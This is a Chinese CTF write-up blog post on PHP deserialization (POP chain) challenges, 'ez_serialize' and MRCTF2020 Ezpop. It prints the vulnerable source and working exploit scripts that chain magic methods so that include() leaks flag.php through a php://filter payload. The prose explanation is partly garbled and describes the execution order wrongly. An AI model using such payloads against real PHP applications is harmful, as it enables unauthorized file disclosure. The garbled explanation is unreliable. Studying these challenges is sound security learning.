ez_serialize

最新推荐文章于 2024-11-08 16:09:18 发布
最新推荐文章于 2024-11-08 16:09:18 发布
阅读量288 收藏 4
点赞数 3
文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BoJing6/article/details/137212419
版权
文章讲述了PHP中的反序列化过程如何导致安全漏洞,通过示例展示了如何利用`__invoke`、`__wakeup`和`__toString`等特殊方法构建递归对象图,以及如何通过恶意输入检测。
摘要由CSDN通过智能技术生成

源码

<?php
highlight_file(__FILE__);

class A{
  public $var_1;
  
  public function __invoke(){
   include($this->var_1);
  }
}

class B{
  public $q;
  public function __wakeup()
{
  if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
            echo "hacker";           
        }
}

}
class C{
  public $var;
  public $z;
    public function __toString(){
        return $this->z->var;
    }
}

class D{
  public $p;
    public function __get($key){
        $function = $this->p;
        return $function();
    }  
}

if(isset($_GET['payload']))
{
    unserialize($_GET['payload']);
}
?>

pop链子如下

B.__wakeup() --> C.__toString() --> D.__get() --> A.__invoke()

exp如下

<?php

class A{
  public $var_1='php://filter/read=convert.base64-encode/resource=flag.php';
}

class B{
  public $q;
}
class C{
  public $var;
  public $z;
}

class D{
  public $p; 
}

$a=new B();
$b=new C();
$c=new D();
$d=new A();
$a->q=$b;
$b->z=$c;
$c->p=$d;
echo serialize($a);

?>

解释如下

对于这个pop链的执行过程,可以进一步详细解释。首先,让我们逐步追踪反序列化的过程:

反序列化开始时,会先对最内层的对象a进行反序列化,即将‘a进行反序列化,即将‘var_1属性赋值为字符串"php://filter/read=convert.base64-encode/resource=flag.php"`。

然后,对对象d进行反序列化,它的‘d进行反序列化,它的‘p属性引用了对象$a。在反序列化过程中,会调用对象$d的__get()`函数,返回对象$a的结果。

接下来是对象c的反序列化,其中‘c的反序列化,其中‘z属性引用了对象$d。同样,在反序列化过程中,会调用对象$c的__get()函数,再次触发对象$d的__get()`函数,将对象a返回给对象a返回给对象c。

最后,对对象b进行反序列化,它的‘b进行反序列化,它的‘q属性引用了对象$c。在这一步中,会调用对象$b的__wakeup()函数。在当前代码中,__wakeup()函数使用正则表达式匹配$q`属性以检测恶意输入,如果匹配成功,则输出"hacker"。

在示例中,C类中的var属性是一个指向自己的引用。也就是说,$c->var指向了$c对象本身。这样的引用关系可以在对象内部形成递归结构,即对象包含对自身的引用。

当我们将这个对象进行序列化时,整个对象图(包括引用关系)都会被序列化。这意味着在序列化过程中,会将$c对象及其相关引用也进行序列化。在反序列化时,被序列化的对象图会被还原,重建出原始的对象及其引用关系。

由于C类实现了__toString()方法,该方法定义了如何以字符串形式表示对象。在示例中,__toString()方法返回了$z属性的var值,即$a->var_1。因此,在反序列化时,如果尝试将$c对象作为字符串输出(例如使用echo语句),就会间接调用C类的__toString()方法,从而返回$a->var_1的值。

总结起来,尽管示例中没有直接尝试输出C类的对象,但是由于序列化和反序列化过程会还原整个对象图,当尝试以字符串形式输出$c对象时,会触发间接调用C类的__toString()方法,并返回相应的值。

[MRCTF2020]Ezpop

此题同理

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

pop链如下

<?php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

}

class Test{
    public $p;
     public function __get($key){
        $function = $this->p;
        return $function();
    }
}

$a= new Show();
$a->source=new Show();
$a->source->str=new Test();
$a->source->str->p=new Modifier();
echo urlencode(serialize($a));
?>


原文链接:https://blog.csdn.net/2301_76690905/article/details/133763490

BoJing6
关注
[校赛] - Web - EzSerialize
1tachi的博客
11-30 390
源码 <?php highlight_file(__FILE__); class flag{ public $key; public function __destruct(){ if($this -> key === 'yes'){ include('flag.php'); echo $flag; }else{ die("No,You don't have key!");
【BUGKU之ez_java_serialize
qq_40646572的博客
04-12 5464
BUGKU之java反序列化练习
BugKu_ez_java_serialize
qq_53460654的博客
12-20 789
简单的一道java反序列化题
[BugKu Web]ez_serialize
qq_41513009的博客
04-23 4435
[BugKu] Web-ez_java_serialize
ez_serialize复现
Sk1y的博客
10-13 603
文章目录解题过程 解题过程 题目给了源码 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer";
java 序列化serialize的小运用,密码加密存取
wilver的博客
10-26 2901
package com.oracle.test.serialize;import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.Obje
NSSCTF ez_unserialize
m0_49257076的博客
11-02 1173
打开题目是胡桃摇的表情包(手动滑稽????),下面是“题目在哪” 这边是上手直接使用蚁剑扫描得到的robots.txt文件,然后打开之后有cl45s.php文件,访问之后可以看到题目的源码 观察源码就知道是一个简单的unserialize,手写一下(菜狗枯了) <?php class wllm{ public $admin; public $passwd; public function __construct(){ $this->admin ...
[MRCTF2021]Web复现ez_larave1
Huamang的博客
04-20 972
ez_larave1 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x get到一个新工具:BeyondCompare,用来比较文件差异的,可以比较方便的看出他做了哪些开发 把5.7.x的源码下载下来,比较一下,发现序列化! 有个小绕过,在serialize后随便加一点东西就可以了,比如serializeabc 与网上的poc不同,他的路由命名为hello了,在hello路由下可以执行反序列化 在网上找到的cve复现,看到漏洞是在PendingCommand.php出现的,跑去看
PHP代码审计(反序列化)
Thewei666的博客
05-13 1170
在传递变量的过程中主要作用是保存一个对象方便以后重用。php有可能遇到变量值要跨脚本文件传递的过程。试想,如果为一个脚本中想要调用之前一个脚本的变量但是前一个脚本已经执行完毕,所有的变量和内容释放掉了,我们要如何操作呢?让前一个脚本不断的循环,等待后面脚本调用。这肯定是不现实的。serialize和unserialize就是用来解决这一问题的。serialize可以将变量转换为字符串并且在转换中可以保存当前变量的值;unserialize则可以将serialize生成的字符串变换回变量。
vnctf easy_java
weixin_53747083的博客
03-11 4364
前段时间小编参加了vnctf并怀疑人生了 (因为我不会java),但我在比赛复现后询问了大佬,再次审计代码,这两天捋顺了思路,这里写下我的解题过程进入页面,是这么一个页面 zh
【比赛WP】第三届西北工业大学大学生网络空间安全挑战赛个人WP@Y
记录学习成长之路上的点点滴滴
10-30 191
2023/10/11-2023/10/24 第三届西北工业大学大学生网络空间安全挑战赛
java serialize
Hack_ZZQ
08-12 1397
可能最先接触的序列化莫过于就是学习io 的时候讲的Objectoutputstream /ObjectInputStream 了把, 实现serizlize 接口,这种方式是方便,但是他的效率,从内存占用来说确实不佳 ,我们这次拿java 的序列化,和google 提供的protobuf 比较, 算了把说说概念,什么是序列化在java 中? 序列化 :  把一个对象转换为2 字节数组, 反序列...
初探Java序列化(2)-writeObject/readObject
无止于天涯 - Always on the Road
02-26 7878
上一篇《初探Java序列化(Serialization)》给我们大体介绍了什么是序列化和反序列化,以及解析了一下序列化出来的文件。接着我们看看JDK具体如何序列化一个Object。         在序列化过程中,虚拟机会试图调用对象类里的writeObject() 和readObject(),进行用户自定义的序列化和反序列化,如果没有则调用ObjectOutputStream.defaultW
java serialize_Java序列化(Serialize)和反序列化(Deserialize
weixin_34945060的博客
02-21 1695
对象的序列化一、目的:将对象转换成与平台无关的二进制流,从而可以保存到磁盘或者进行网络传输,其它程序获 得这个二进制流后可以将其还原成对象。序列化机制可以使对象可以脱离程序的运行而对立存在。————————————————————————————————————————二、是什么?序列化(Serialize)指将一个java对象写入IO流中,与此对应的是,对象的反序列化(Deserialize)则...
java对象串行化_Java中对象的串行化(Serialization)和transient关键字
weixin_32204175的博客
02-13 341
Java中对象的串行化(Serialization)和transient关键字:对象的串行化(Serialization)一、串行化的概念和目的1.什么是串行化对象的寿命通常随着生成该对象的程序的终止而终止。有时候,可能需要将对象的状态保存下来,在需要时再将对象恢复。我们把对象的这种能记录自己的状态以便将来再生的能力。叫作对象的持续性(persistence)。对象通过写出描述自己状态的数值来记录...
java 实现serialize id_Java 序列化Serializable详解(附详细例子)
weixin_36036925的博客
02-13 1816
Java 序列化Serializable详解(附详细例子)1、什么是序列化和反序列化Serialization(序列化)是一种将对象以一连串的字节描述的过程;反序列化deserialization是一种将这些字节重建成一个对象的过程。2、什么情况下需要序列化a)当你想把的内存中的对象保存到一个文件中或者数据库中时候;b)当你想用套接字在网络上传送对象的时候;c)当你想通过RMI传输对象的时候;3、...
Java Serialize Java序列化
饮马天涯
07-31 430
Java序列化是指: 将那些实现了serializable接口的对象转换成一个字节序列// TODO:总结
Echarts 折线图
weixin_44443380的博客
11-08 241
解决方法:设置emphasis.lineStyle和折线图本身lineStyle相同即可。问题:鼠标悬停在折线图上,折线变粗。3、去掉 hover 折线变粗方法。
vue2面试题5|[2024-11-08]
最新发布
m0_49474690的博客
11-08 912
关于vue2API的面试题
gsoap soap_serialize
08-13
其中的soap_serialize函数用于对SOAP消息进行序列化,将消息转换成字符串的格式,以便进行网络传输或存储。 通过调用soap_serialize函数,我们可以将一个SOAP消息的内容转换成一个字符数组,以便于后续的处理。这个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值